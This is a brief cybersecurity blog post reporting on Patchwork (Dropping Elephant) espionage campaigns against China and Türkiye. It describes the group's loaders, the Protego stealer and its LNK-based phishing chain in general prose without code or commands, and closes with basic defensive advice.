The cyber-espionage group known as Patchwork (aka Dropping Elephant) is stepping up its game — both in tactical sophistication and geographic reach — with recent operations spanning China and, for the first time, Türkiye, a global player in unmanned aerial vehicle (UAV) exports and hypersonic missile development.
The group’s recent wave of attacks deployed a Rust-based loader that decrypts and launches a C#-based information-stealing trojan named Protego, capable of siphoning data from infected Windows systems. The campaign lured victims with decoy content referencing China's power grid, a critical infrastructure area of national interest.
Meanwhile, a separate and recent campaign against Türkiye reflects Patchwork’s growing ambition and operational range. Using phishing emails embedded with malicious Windows shortcut (LNK) files, the attackers kicked off a multi-stage infection chain. These shortcut files triggered PowerShell commands that retrieved further payloads from a spoofed domain (“expouav[.]org”), which impersonated a legitimate international UAV conference site to dupe targets.
Once started, the malware chain silently executed in the background — allowing the threat actor to conduct reconnaissance activities, including taking screenshots and exfiltrating system data — all without user awareness.
What’s notable is the group’s evolution in tooling. Patchwork has shifted from previously observed x64 DLL variants to more lightweight x86 PE executables, showcasing architectural adaptability and growing command-and-control (C2) sophistication. The new infrastructure also imitates legitimate websites to better avoid detection.
Interestingly, researchers at QiAnXin earlier this year discovered infrastructure overlaps between Patchwork and the DoNot Team (aka APT-Q-38 or Bellyworm), hinting at potential collaboration or shared tooling among both APT groups.
Final Thoughts
Patchwork is no longer just a regional nuisance. It’s a highly adaptive cyber-espionage actor capable of combining deception, stealth, and evolving malware architectures to target geopolitical rivals — all while staying several steps ahead of traditional detection methods.
Best practices to beat threat actors like Patchwork?
Stay alert. Carry out periodic vulnerability assessments. Conduct regular cyber awareness training for team members on phishing and other social engineering tactics.
Loved this? Subscribe to the Cyberkach blog for more.